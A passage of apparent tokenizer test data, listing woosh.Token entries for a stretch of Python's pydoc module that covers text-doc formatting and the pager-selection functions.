woosh.Token(woosh.NAME, 'self', 1531, 15, 1531, 19),
woosh.Token(woosh.OP, '.', 1531, 19, 1531, 20),
woosh.Token(woosh.NAME, 'repr', 1531, 20, 1531, 24),
woosh.Token(woosh.OP, '(', 1531, 24, 1531, 25),
woosh.Token(woosh.NAME, 'object', 1531, 25, 1531, 31),
woosh.Token(woosh.OP, ')', 1531, 31, 1531, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1531, 32, 1532, 0),
woosh.Token(woosh.NAME, 'if', 1532, 8, 1532, 10),
woosh.Token(woosh.NAME, 'maxlen', 1532, 11, 1532, 17),
woosh.Token(woosh.OP, ':', 1532, 17, 1532, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1532, 18, 1533, 0),
woosh.Token(woosh.INDENT, ' ', 1533, 0, 1533, 12),
woosh.Token(woosh.NAME, 'line', 1533, 12, 1533, 16),
woosh.Token(woosh.OP, '=', 1533, 17, 1533, 18),
woosh.Token(woosh.OP, '(', 1533, 19, 1533, 20),
woosh.Token(woosh.NAME, 'name', 1533, 20, 1533, 24),
woosh.Token(woosh.NAME, 'and', 1533, 25, 1533, 28),
woosh.Token(woosh.NAME, 'name', 1533, 29, 1533, 33),
woosh.Token(woosh.OP, '+', 1533, 34, 1533, 35),
woosh.Token(woosh.STRING, "' = '", 1533, 36, 1533, 41),
woosh.Token(woosh.NAME, 'or', 1533, 42, 1533, 44),
woosh.Token(woosh.STRING, "''", 1533, 45, 1533, 47),
woosh.Token(woosh.OP, ')', 1533, 47, 1533, 48),
woosh.Token(woosh.OP, '+', 1533, 49, 1533, 50),
woosh.Token(woosh.NAME, 'repr', 1533, 51, 1533, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1533, 55, 1534, 0),
woosh.Token(woosh.NAME, 'chop', 1534, 12, 1534, 16),
woosh.Token(woosh.OP, '=', 1534, 17, 1534, 18),
woosh.Token(woosh.NAME, 'maxlen', 1534, 19, 1534, 25),
woosh.Token(woosh.OP, '-', 1534, 26, 1534, 27),
woosh.Token(woosh.NAME, 'len', 1534, 28, 1534, 31),
woosh.Token(woosh.OP, '(', 1534, 31, 1534, 32),
woosh.Token(woosh.NAME, 'line', 1534, 32, 1534, 36),
woosh.Token(woosh.OP, ')', 1534, 36, 1534, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1534, 37, 1535, 0),
woosh.Token(woosh.NAME, 'if', 1535, 12, 1535, 14),
woosh.Token(woosh.NAME, 'chop', 1535, 15, 1535, 19),
woosh.Token(woosh.OP, '<', 1535, 20, 1535, 21),
woosh.Token(woosh.NUMBER, '0', 1535, 22, 1535, 23),
woosh.Token(woosh.OP, ':', 1535, 23, 1535, 24),
woosh.Token(woosh.NAME, 'repr', 1535, 25, 1535, 29),
woosh.Token(woosh.OP, '=', 1535, 30, 1535, 31),
woosh.Token(woosh.NAME, 'repr', 1535, 32, 1535, 36),
woosh.Token(woosh.OP, '[', 1535, 36, 1535, 37),
woosh.Token(woosh.OP, ':', 1535, 37, 1535, 38),
woosh.Token(woosh.NAME, 'chop', 1535, 38, 1535, 42),
woosh.Token(woosh.OP, ']', 1535, 42, 1535, 43),
woosh.Token(woosh.OP, '+', 1535, 44, 1535, 45),
woosh.Token(woosh.STRING, "'...'", 1535, 46, 1535, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 1535, 51, 1536, 0),
woosh.Token(woosh.DEDENT, ' ', 1536, 0, 1536, 8),
woosh.Token(woosh.NAME, 'line', 1536, 8, 1536, 12),
woosh.Token(woosh.OP, '=', 1536, 13, 1536, 14),
woosh.Token(woosh.OP, '(', 1536, 15, 1536, 16),
woosh.Token(woosh.NAME, 'name', 1536, 16, 1536, 20),
woosh.Token(woosh.NAME, 'and', 1536, 21, 1536, 24),
woosh.Token(woosh.NAME, 'self', 1536, 25, 1536, 29),
woosh.Token(woosh.OP, '.', 1536, 29, 1536, 30),
woosh.Token(woosh.NAME, 'bold', 1536, 30, 1536, 34),
woosh.Token(woosh.OP, '(', 1536, 34, 1536, 35),
woosh.Token(woosh.NAME, 'name', 1536, 35, 1536, 39),
woosh.Token(woosh.OP, ')', 1536, 39, 1536, 40),
woosh.Token(woosh.OP, '+', 1536, 41, 1536, 42),
woosh.Token(woosh.STRING, "' = '", 1536, 43, 1536, 48),
woosh.Token(woosh.NAME, 'or', 1536, 49, 1536, 51),
woosh.Token(woosh.STRING, "''", 1536, 52, 1536, 54),
woosh.Token(woosh.OP, ')', 1536, 54, 1536, 55),
woosh.Token(woosh.OP, '+', 1536, 56, 1536, 57),
woosh.Token(woosh.NAME, 'repr', 1536, 58, 1536, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 1536, 62, 1537, 0),
woosh.Token(woosh.NAME, 'if', 1537, 8, 1537, 10),
woosh.Token(woosh.NAME, 'not', 1537, 11, 1537, 14),
woosh.Token(woosh.NAME, 'doc', 1537, 15, 1537, 18),
woosh.Token(woosh.OP, ':', 1537, 18, 1537, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1537, 19, 1538, 0),
woosh.Token(woosh.INDENT, ' ', 1538, 0, 1538, 12),
woosh.Token(woosh.NAME, 'doc', 1538, 12, 1538, 15),
woosh.Token(woosh.OP, '=', 1538, 16, 1538, 17),
woosh.Token(woosh.NAME, 'getdoc', 1538, 18, 1538, 24),
woosh.Token(woosh.OP, '(', 1538, 24, 1538, 25),
woosh.Token(woosh.NAME, 'object', 1538, 25, 1538, 31),
woosh.Token(woosh.OP, ')', 1538, 31, 1538, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1538, 32, 1539, 0),
woosh.Token(woosh.DEDENT, ' ', 1539, 0, 1539, 8),
woosh.Token(woosh.NAME, 'if', 1539, 8, 1539, 10),
woosh.Token(woosh.NAME, 'doc', 1539, 11, 1539, 14),
woosh.Token(woosh.OP, ':', 1539, 14, 1539, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1539, 15, 1540, 0),
woosh.Token(woosh.INDENT, ' ', 1540, 0, 1540, 12),
woosh.Token(woosh.NAME, 'line', 1540, 12, 1540, 16),
woosh.Token(woosh.OP, '+=', 1540, 17, 1540, 19),
woosh.Token(woosh.STRING, "'\\n'", 1540, 20, 1540, 24),
woosh.Token(woosh.OP, '+', 1540, 25, 1540, 26),
woosh.Token(woosh.NAME, 'self', 1540, 27, 1540, 31),
woosh.Token(woosh.OP, '.', 1540, 31, 1540, 32),
woosh.Token(woosh.NAME, 'indent', 1540, 32, 1540, 38),
woosh.Token(woosh.OP, '(', 1540, 38, 1540, 39),
woosh.Token(woosh.NAME, 'str', 1540, 39, 1540, 42),
woosh.Token(woosh.OP, '(', 1540, 42, 1540, 43),
woosh.Token(woosh.NAME, 'doc', 1540, 43, 1540, 46),
woosh.Token(woosh.OP, ')', 1540, 46, 1540, 47),
woosh.Token(woosh.OP, ')', 1540, 47, 1540, 48),
woosh.Token(woosh.OP, '+', 1540, 49, 1540, 50),
woosh.Token(woosh.STRING, "'\\n'", 1540, 51, 1540, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1540, 55, 1541, 0),
woosh.Token(woosh.DEDENT, ' ', 1541, 0, 1541, 8),
woosh.Token(woosh.NAME, 'return', 1541, 8, 1541, 14),
woosh.Token(woosh.NAME, 'line', 1541, 15, 1541, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1541, 19, 1542, 0),
woosh.Token(woosh.DEDENT, '', 1543, 0, 1543, 0),
woosh.Token(woosh.DEDENT, '', 1543, 0, 1543, 0),
woosh.Token(woosh.NAME, 'class', 1543, 0, 1543, 5),
woosh.Token(woosh.NAME, '_PlainTextDoc', 1543, 6, 1543, 19),
woosh.Token(woosh.OP, '(', 1543, 19, 1543, 20),
woosh.Token(woosh.NAME, 'TextDoc', 1543, 20, 1543, 27),
woosh.Token(woosh.OP, ')', 1543, 27, 1543, 28),
woosh.Token(woosh.OP, ':', 1543, 28, 1543, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1543, 29, 1544, 0),
woosh.Token(woosh.INDENT, ' ', 1544, 0, 1544, 4),
woosh.Token(woosh.STRING, '"""Subclass of TextDoc which overrides string styling"""', 1544, 4, 1544, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1544, 60, 1545, 0),
woosh.Token(woosh.NAME, 'def', 1545, 4, 1545, 7),
woosh.Token(woosh.NAME, 'bold', 1545, 8, 1545, 12),
woosh.Token(woosh.OP, '(', 1545, 12, 1545, 13),
woosh.Token(woosh.NAME, 'self', 1545, 13, 1545, 17),
woosh.Token(woosh.OP, ',', 1545, 17, 1545, 18),
woosh.Token(woosh.NAME, 'text', 1545, 19, 1545, 23),
woosh.Token(woosh.OP, ')', 1545, 23, 1545, 24),
woosh.Token(woosh.OP, ':', 1545, 24, 1545, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1545, 25, 1546, 0),
woosh.Token(woosh.INDENT, ' ', 1546, 0, 1546, 8),
woosh.Token(woosh.NAME, 'return', 1546, 8, 1546, 14),
woosh.Token(woosh.NAME, 'text', 1546, 15, 1546, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1546, 19, 1547, 0),
woosh.Token(woosh.COMMENT, '# --------------------------------------------------------- user interfaces', 1548, 0, 1548, 75),
woosh.Token(woosh.DEDENT, '', 1550, 0, 1550, 0),
woosh.Token(woosh.DEDENT, '', 1550, 0, 1550, 0),
woosh.Token(woosh.NAME, 'def', 1550, 0, 1550, 3),
woosh.Token(woosh.NAME, 'pager', 1550, 4, 1550, 9),
woosh.Token(woosh.OP, '(', 1550, 9, 1550, 10),
woosh.Token(woosh.NAME, 'text', 1550, 10, 1550, 14),
woosh.Token(woosh.OP, ')', 1550, 14, 1550, 15),
woosh.Token(woosh.OP, ':', 1550, 15, 1550, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1550, 16, 1551, 0),
woosh.Token(woosh.INDENT, ' ', 1551, 0, 1551, 4),
woosh.Token(woosh.STRING, '"""The first time this is called, determine what kind of pager to use."""', 1551, 4, 1551, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 1551, 77, 1552, 0),
woosh.Token(woosh.NAME, 'global', 1552, 4, 1552, 10),
woosh.Token(woosh.NAME, 'pager', 1552, 11, 1552, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1552, 16, 1553, 0),
woosh.Token(woosh.NAME, 'pager', 1553, 4, 1553, 9),
woosh.Token(woosh.OP, '=', 1553, 10, 1553, 11),
woosh.Token(woosh.NAME, 'getpager', 1553, 12, 1553, 20),
woosh.Token(woosh.OP, '(', 1553, 20, 1553, 21),
woosh.Token(woosh.OP, ')', 1553, 21, 1553, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 1553, 22, 1554, 0),
woosh.Token(woosh.NAME, 'pager', 1554, 4, 1554, 9),
woosh.Token(woosh.OP, '(', 1554, 9, 1554, 10),
woosh.Token(woosh.NAME, 'text', 1554, 10, 1554, 14),
woosh.Token(woosh.OP, ')', 1554, 14, 1554, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1554, 15, 1555, 0),
woosh.Token(woosh.DEDENT, '', 1556, 0, 1556, 0),
woosh.Token(woosh.NAME, 'def', 1556, 0, 1556, 3),
woosh.Token(woosh.NAME, 'getpager', 1556, 4, 1556, 12),
woosh.Token(woosh.OP, '(', 1556, 12, 1556, 13),
woosh.Token(woosh.OP, ')', 1556, 13, 1556, 14),
woosh.Token(woosh.OP, ':', 1556, 14, 1556, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1556, 15, 1557, 0),
woosh.Token(woosh.INDENT, ' ', 1557, 0, 1557, 4),
woosh.Token(woosh.STRING, '"""Decide what method to use for paging through text."""', 1557, 4, 1557, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1557, 60, 1558, 0),
woosh.Token(woosh.NAME, 'if', 1558, 4, 1558, 6),
woosh.Token(woosh.NAME, 'not', 1558, 7, 1558, 10),
woosh.Token(woosh.NAME, 'hasattr', 1558, 11, 1558, 18),
woosh.Token(woosh.OP, '(', 1558, 18, 1558, 19),
woosh.Token(woosh.NAME, 'sys', 1558, 19, 1558, 22),
woosh.Token(woosh.OP, '.', 1558, 22, 1558, 23),
woosh.Token(woosh.NAME, 'stdin', 1558, 23, 1558, 28),
woosh.Token(woosh.OP, ',', 1558, 28, 1558, 29),
woosh.Token(woosh.STRING, '"isatty"', 1558, 30, 1558, 38),
woosh.Token(woosh.OP, ')', 1558, 38, 1558, 39),
woosh.Token(woosh.OP, ':', 1558, 39, 1558, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 1558, 40, 1559, 0),
woosh.Token(woosh.INDENT, ' ', 1559, 0, 1559, 8),
woosh.Token(woosh.NAME, 'return', 1559, 8, 1559, 14),
woosh.Token(woosh.NAME, 'plainpager', 1559, 15, 1559, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1559, 25, 1560, 0),
woosh.Token(woosh.DEDENT, ' ', 1560, 0, 1560, 4),
woosh.Token(woosh.NAME, 'if', 1560, 4, 1560, 6),
woosh.Token(woosh.NAME, 'not', 1560, 7, 1560, 10),
woosh.Token(woosh.NAME, 'hasattr', 1560, 11, 1560, 18),
woosh.Token(woosh.OP, '(', 1560, 18, 1560, 19),
woosh.Token(woosh.NAME, 'sys', 1560, 19, 1560, 22),
woosh.Token(woosh.OP, '.', 1560, 22, 1560, 23),
woosh.Token(woosh.NAME, 'stdout', 1560, 23, 1560, 29),
woosh.Token(woosh.OP, ',', 1560, 29, 1560, 30),
woosh.Token(woosh.STRING, '"isatty"', 1560, 31, 1560, 39),
woosh.Token(woosh.OP, ')', 1560, 39, 1560, 40),
woosh.Token(woosh.OP, ':', 1560, 40, 1560, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1560, 41, 1561, 0),
woosh.Token(woosh.INDENT, ' ', 1561, 0, 1561, 8),
woosh.Token(woosh.NAME, 'return', 1561, 8, 1561, 14),
woosh.Token(woosh.NAME, 'plainpager', 1561, 15, 1561, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1561, 25, 1562, 0),
woosh.Token(woosh.DEDENT, ' ', 1562, 0, 1562, 4),
woosh.Token(woosh.NAME, 'if', 1562, 4, 1562, 6),
woosh.Token(woosh.NAME, 'not', 1562, 7, 1562, 10),
woosh.Token(woosh.NAME, 'sys', 1562, 11, 1562, 14),
woosh.Token(woosh.OP, '.', 1562, 14, 1562, 15),
woosh.Token(woosh.NAME, 'stdin', 1562, 15, 1562, 20),
woosh.Token(woosh.OP, '.', 1562, 20, 1562, 21),
woosh.Token(woosh.NAME, 'isatty', 1562, 21, 1562, 27),
woosh.Token(woosh.OP, '(', 1562, 27, 1562, 28),
woosh.Token(woosh.OP, ')', 1562, 28, 1562, 29),
woosh.Token(woosh.NAME, 'or', 1562, 30, 1562, 32),
woosh.Token(woosh.NAME, 'not', 1562, 33, 1562, 36),
woosh.Token(woosh.NAME, 'sys', 1562, 37, 1562, 40),
woosh.Token(woosh.OP, '.', 1562, 40, 1562, 41),
woosh.Token(woosh.NAME, 'stdout', 1562, 41, 1562, 47),
woosh.Token(woosh.OP, '.', 1562, 47, 1562, 48),
woosh.Token(woosh.NAME, 'isatty', 1562, 48, 1562, 54),
woosh.Token(woosh.OP, '(', 1562, 54, 1562, 55),
woosh.Token(woosh.OP, ')', 1562, 55, 1562, 56),
woosh.Token(woosh.OP, ':', 1562, 56, 1562, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 1562, 57, 1563, 0),
woosh.Token(woosh.INDENT, ' ', 1563, 0, 1563, 8),
woosh.Token(woosh.NAME, 'return', 1563, 8, 1563, 14),
woosh.Token(woosh.NAME, 'plainpager', 1563, 15, 1563, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1563, 25, 1564, 0),
woosh.Token(woosh.DEDENT, ' ', 1564, 0, 1564, 4),
woosh.Token(woosh.NAME, 'use_pager', 1564, 4, 1564, 13),
woosh.Token(woosh.OP, '=', 1564, 14, 1564, 15),
woosh.Token(woosh.NAME, 'os', 1564, 16, 1564, 18),
woosh.Token(woosh.OP, '.', 1564, 18, 1564, 19),
woosh.Token(woosh.NAME, 'environ', 1564, 19, 1564, 26),
woosh.Token(woosh.OP, '.', 1564, 26, 1564, 27),
woosh.Token(woosh.NAME, 'get', 1564, 27, 1564, 30),
woosh.Token(woosh.OP, '(', 1564, 30, 1564, 31),
woosh.Token(woosh.STRING, "'MANPAGER'", 1564, 31, 1564, 41),
woosh.Token(woosh.OP, ')', 1564, 41, 1564, 42),
woosh.Token(woosh.NAME, 'or', 1564, 43, 1564, 45),
woosh.Token(woosh.NAME, 'os', 1564, 46, 1564, 48),
woosh.Token(woosh.OP, '.', 1564, 48, 1564, 49),
woosh.Token(woosh.NAME, 'environ', 1564, 49, 1564, 56),
woosh.Token(woosh.OP, '.', 1564, 56, 1564, 57),
woosh.Token(woosh.NAME, 'get', 1564, 57, 1564, 60),
woosh.Token(woosh.OP, '(', 1564, 60, 1564, 61),
woosh.Token(woosh.STRING, "'PAGER'", 1564, 61, 1564, 68),
woosh.Token(woosh.OP, ')', 1564, 68, 1564, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 1564, 69, 1565, 0),
woosh.Token(woosh.NAME, 'if', 1565, 4, 1565, 6),
woosh.Token(woosh.NAME, 'use_pager', 1565, 7, 1565, 16),
woosh.Token(woosh.OP, ':', 1565, 16, 1565, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1565, 17, 1566, 0),
woosh.Token(woosh.INDENT, ' ', 1566, 0, 1566, 8),
woosh.Token(woosh.NAME, 'if', 1566, 8, 1566, 10),
woosh.Token(woosh.NAME, 'sys', 1566, 11, 1566, 14),
woosh.Token(woosh.OP, '.', 1566, 14, 1566, 15),
woosh.Token(woosh.NAME, 'platform', 1566, 15, 1566, 23),
woosh.Token(woosh.OP, '==', 1566, 24, 1566, 26),
woosh.Token(woosh.STRING, "'win32'", 1566, 27, 1566, 34),
woosh.Token(woosh.OP, ':', 1566, 34, 1566, 35),
woosh.Token(woosh.COMMENT, '# pipes completely broken in Windows', 1566, 36, 1566, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1566, 72, 1567, 0),
woosh.Token(woosh.INDENT, ' ', 1567, 0, 1567, 12),
woosh.Token(woosh.NAME, 'return', 1567, 12, 1567, 18),
woosh.Token(woosh.NAME, 'lambda', 1567, 19, 1567, 25),
woosh.Token(woosh.NAME, 'text', 1567, 26, 1567, 30),
woosh.Token(woosh.OP, ':', 1567, 30, 1567, 31),
woosh.Token(woosh.NAME, 'tempfilepager', 1567, 32, 1567, 45),
woosh.Token(woosh.OP, '(', 1567, 45, 1567, 46),
woosh.Token(woosh.NAME, 'plain', 1567, 46, 1567, 51),
woosh.Token(woosh.OP, '(', 1567, 51, 1567, 52),
woosh.Token(woosh.NAME, 'text', 1567, 52, 1567, 56),
woosh.Token(woosh.OP, ')', 1567, 56, 1567, 57),
woosh.Token(woosh.OP, ',', 1567, 57, 1567, 58),
woosh.Token(woosh.NAME, 'use_pager', 1567, 59, 1567, 68),
woosh.Token(woosh.OP, ')', 1567, 68, 1567, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 1567, 69, 1568, 0),
woosh.Token(woosh.DEDENT, ' ', 1568, 0, 1568, 8),
woosh.Token(woosh.NAME, 'elif', 1568, 8, 1568, 12),
woosh.Token(woosh.NAME, 'os', 1568, 13, 1568, 15),
woosh.Token(woosh.OP, '.', 1568, 15, 1568, 16),
woosh.Token(woosh.NAME, 'environ', 1568, 16, 1568, 23),
woosh.Token(woosh.OP, '.', 1568, 23, 1568, 24),
woosh.Token(woosh.NAME, 'get', 1568, 24, 1568, 27),
woosh.Token(woosh.OP, '(', 1568, 27, 1568, 28),
woosh.Token(woosh.STRING, "'TERM'", 1568, 28, 1568, 34),
woosh.Token(woosh.OP, ')', 1568, 34, 1568, 35),
woosh.Token(woosh.NAME, 'in', 1568, 36, 1568, 38),
woosh.Token(woosh.OP, '(', 1568, 39, 1568, 40),
woosh.Token(woosh.STRING, "'dumb'", 1568, 40, 1568, 46),
woosh.Token(woosh.OP, ',', 1568, 46, 1568, 47),
woosh.Token(woosh.STRING, "'emacs'", 1568, 48, 1568, 55),
woosh.Token(woosh.OP, ')', 1568, 55, 1568, 56),
woosh.Token(woosh.OP, ':', 1568, 56, 1568, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 1568, 57, 1569, 0),
woosh.Token(woosh.INDENT, ' ', 1569, 0, 1569, 12),
woosh.Token(woosh.NAME, 'return', 1569, 12, 1569, 18),
woosh.Token(woosh.NAME, 'lambda', 1569, 19, 1569, 25),
woosh.Token(woosh.NAME, 'text', 1569, 26, 1569, 30),
woosh.Token(woosh.OP, ':', 1569, 30, 1569, 31),
woosh.Token(woosh.NAME, 'pipepager', 1569, 32, 1569, 41),
woosh.Token(woosh.OP, '(', 1569, 41, 1569, 42),
woosh.Token(woosh.NAME, 'plain', 1569, 42, 1569, 47),
woosh.Token(woosh.OP, '(', 1569, 47, 1569, 48),
woosh.Token(woosh.NAME, 'text', 1569, 48, 1569, 52),
woosh.Token(woosh.OP, ')', 1569, 52, 1569, 53),
woosh.Token(woosh.OP, ',', 1569, 53, 1569, 54),
woosh.Token(woosh.NAME, 'use_pager', 1569, 55, 1569, 64),
woosh.Token(woosh.OP, ')', 1569, 64, 1569, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 1569, 65, 1570, 0),
woosh.Token(woosh.DEDENT, ' ', 1570, 0, 1570, 8),
woosh.Token(woosh.NAME, 'else', 1570, 8, 1570, 12),
woosh.Token(woosh.OP, ':', 1570, 12, 1570, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1570, 13, 1571, 0),
woosh.Token(woosh.INDENT, ' ', 1571, 0, 1571, 12),
woosh.Token(woosh.NAME, 'return', 1571, 12, 1571, 18),
woosh.Token(woosh.NAME, 'lambda', 1571, 19, 1571, 25),
woosh.Token(woosh.NAME, 'text', 1571, 26, 1571, 30),
woosh.Token(woosh.OP, ':', 1571, 30, 1571, 31),
woosh.Token(woosh.NAME, 'pipepager', 1571, 32, 1571, 41),
woosh.Token(woosh.OP, '(', 1571, 41, 1571, 42),
woosh.Token(woosh.NAME, 'text', 1571, 42, 1571, 46),
woosh.Token(woosh.OP, ',', 1571, 46, 1571, 47),
woosh.Token(woosh.NAME, 'use_pager', 1571, 48, 1571, 57),
woosh.Token(woosh.OP, ')', 1571, 57, 1571, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 1571, 58, 1572, 0),
woosh.Token(woosh.DEDENT, ' ', 1572, 0, 1572, 4),
woosh.Token(woosh.DEDENT, '', 1572, 4, 1572, 4),
woosh.Token(woosh.NAME, 'if', 1572, 4, 1572, 6),
woosh.Token(woosh.NAME, 'os', 1572, 7, 1572, 9),
woosh.Token(woosh.OP, '.', 1572, 9, 1572, 10),
woosh.Token(woosh.NAME, 'environ', 1572, 10, 1572, 17),
woosh.Token(woosh.OP, '.', 1572, 17, 1572, 18),
woosh.Token(woosh.NAME, 'get', 1572, 18, 1572, 21),
woosh.Token(woosh.OP, '(', 1572, 21, 1572, 22),
woosh.Token(woosh.STRING, "'TERM'", 1572, 22, 1572, 28),
woosh.Token(woosh.OP, ')', 1572, 28, 1572, 29),
woosh.Token(woosh.NAME, 'in', 1572, 30, 1572, 32),
woosh.Token(woosh.OP, '(', 1572, 33, 1572, 34),
woosh.Token(woosh.STRING, "'dumb'", 1572, 34, 1572, 40),
woosh.Token(woosh.OP, ',', 1572, 40, 1572, 41),
woosh.Token(woosh.STRING, "'emacs'", 1572, 42, 1572, 49),
woosh.Token(woosh.OP, ')', 1572, 49, 1572, 50),
woosh.Token(woosh.OP, ':', 1572, 50, 1572, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 1572, 51, 1573, 0),
woosh.Token(woosh.INDENT, ' ', 1573, 0, 1573, 8),
woosh.Token(woosh.NAME, 'return', 1573, 8, 1573, 14),
woosh.Token(woosh.NAME, 'plainpager', 1573, 15, 1573, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1573, 25, 1574, 0),
woosh.Token(woosh.DEDENT, ' ', 1574, 0, 1574, 4),
woosh.Token(woosh.NAME, 'if', 1574, 4, 1574, 6),
woosh.Token(woosh.NAME, 'sys', 1574, 7, 1574, 10),
woosh.Token(woosh.OP, '.', 1574, 10, 1574, 11),
woosh.Token(woosh.NAME, 'platform', 1574, 11, 1574, 19),
woosh.Token(woosh.OP, '==', 1574, 20, 1574, 22),
woosh.Token(woosh.STRING, "'win32'", 1574, 23, 1574, 30),
woosh.Token(woosh.OP, ':', 1574, 30, 1574, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1574, 31, 1575, 0),
woosh.Token(woosh.INDENT, ' ', 1575, 0, 1575, 8),
woosh.Token(woosh.NAME, 'return', 1575, 8, 1575, 14),
woosh.Token(woosh.NAME, 'lambda', 1575, 15, 1575, 21),
woosh.Token(woosh.NAME, 'text', 1575, 22, 1575, 26),
woosh.Token(woosh.OP, ':', 1575, 26, 1575, 27),
woosh.Token(woosh.NAME, 'tempfilepager', 1575, 28, 1575, 41),
woosh.Token(woosh.OP, '(', 1575, 41, 1575, 42),
woosh.Token(woosh.NAME, 'plain', 1575, 42, 1575, 47),
woosh.Token(woosh.OP, '(', 1575, 47, 1575, 48),
woosh.Token(woosh.NAME, 'text', 1575, 48, 1575, 52),
woosh.Token(woosh.OP, ')', 1575, 52, 1575, 53),
woosh.Token(woosh.OP, ',', 1575, 53, 1575, 54),
woosh.Token(woosh.STRING, "'more <'", 1575, 55, 1575, 63),
woosh.Token(woosh.OP, ')', 1575, 63, 1575, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1575, 64, 1576, 0),
woosh.Token(woosh.DEDENT, ' ', 1576, 0, 1576, 4),
woosh.Token(woosh.NAME, 'if', 1576, 4, 1576, 6),
woosh.Token(woosh.NAME, 'hasattr', 1576, 7, 1576, 14),
woosh.Token(woosh.OP, '(', 1576, 14, 1576, 15),
woosh.Token(woosh.NAME, 'os', 1576, 15, 1576, 17),
woosh.Token(woosh.OP, ',', 1576, 17, 1576, 18),
woosh.Token(woosh.STRING, "'system'", 1576, 19, 1576, 27),
woosh.Token(woosh.OP, ')', 1576, 27, 1576, 28),
woosh.Token(woosh.NAME, 'and', 1576, 29, 1576, 32),
woosh.Token(woosh.NAME, 'os', 1576, 33, 1576, 35),
woosh.Token(woosh.OP, '.', 1576, 35, 1576, 36),
woosh.Token(woosh.NAME, 'system', 1576, 36, 1576, 42),
woosh.Token(woosh.OP, '(', 1576, 42, 1576, 43),
woosh.Token(woosh.STRING, "'(less) 2>/dev/null'", 1576, 43, 1576, 63),
woosh.Token(woosh.OP, ')', 1576, 63, 1576, 64),
woosh.Token(woosh.OP, '==', 1576, 65, 1576, 67),
woosh.Token(woosh.NUMBER, '0', 1576, 68, 1576, 69),
woosh.Token(woosh.OP, ':', 1576, 69, 1576, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 1576, 70, 1577, 0),
woosh.Token(woosh.INDENT, ' ', 1577, 0, 1577, 8),
woosh.Token(woosh.NAME, 'return', 1577, 8, 1577, 14),
woosh.Token(woosh.NAME, 'lambda', 1577, 15, 1577, 21),
woosh.Token(woosh.NAME, 'text', 1577, 22, 1577, 26),
woosh.Token(woosh.OP, ':', 1577, 26, 1577, 27),
woosh.Token(woosh.NAME, 'pipepager', 1577, 28, 1577, 37),
woosh.Token(woosh.OP, '(', 1577, 37, 1577, 38),
woosh.Token(woosh.NAME, 'text', 1577, 38, 1577, 42),
woosh.Token(woosh.OP, ',', 1577, 42, 1577, 43),
woosh.Token(woosh.STRING, "'less'", 1577, 44, 1577, 50),
woosh.Token(woosh.OP, ')', 1577, 50, 1577, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 1577, 51, 1578, 0),
woosh.Token(woosh.DEDENT, ' ', 1579, 0, 1579, 4),
woosh.Token(woosh.NAME, 'import', 1579, 4, 1579, 10),
woosh.Token(woosh.NAME, 'tempfile', 1579, 11, 1579, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1579, 19, 1580, 0),
woosh.Token(woosh.OP, '(', 1580, 4, 1580, 5),
woosh.Token(woosh.NAME, 'fd', 1580, 5, 1580, 7),
woosh.Token(woosh.OP, ',', 1580, 7, 1580, 8),
woosh.Token(woosh.NAME, 'filename', 1580, 9, 1580, 17),
woosh.Token(woosh.OP, ')', 1580, 17, 1580, 18),
woosh.Token(woosh.OP, '=', 1580, 19, 1580, 20),
woosh.Token(woosh.NAME, 'tempfile', 1580, 21, 1580, 29),
woosh.Token(woosh.OP, '.', 1580, 29, 1580, 30),
woosh.Token(woosh.NAME, 'mkstemp', 1580, 30, 1580, 37),
woosh.Token(woosh.OP, '(', 1580, 37, 1580, 38),
woosh.Token(woosh.OP, ')', 1580, 38, 1580, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1580, 39, 1581, 0),
woosh.Token(woosh.NAME, 'os', 1581, 4, 1581, 6),
woosh.Token(woosh.OP, '.', 1581, 6, 1581, 7),
woosh.Token(woosh.NAME, 'close', 1581, 7, 1581, 12),
woosh.Token(woosh.OP, '(', 1581, 12, 1581, 13),
woosh.Token(woosh.NAME, 'fd', 1581, 13, 1581, 15),
woosh.Token(woosh.OP, ')', 1581, 15, 1581, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1581, 16, 1582, 0),
woosh.Token(woosh.NAME, 'try', 1582, 4, 1582, 7),
woosh.Token(woosh.OP, ':', 1582, 7, 1582, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 1582, 8, 1583, 0),
woosh.Token(woosh.INDENT, ' ', 1583, 0, 1583, 8),
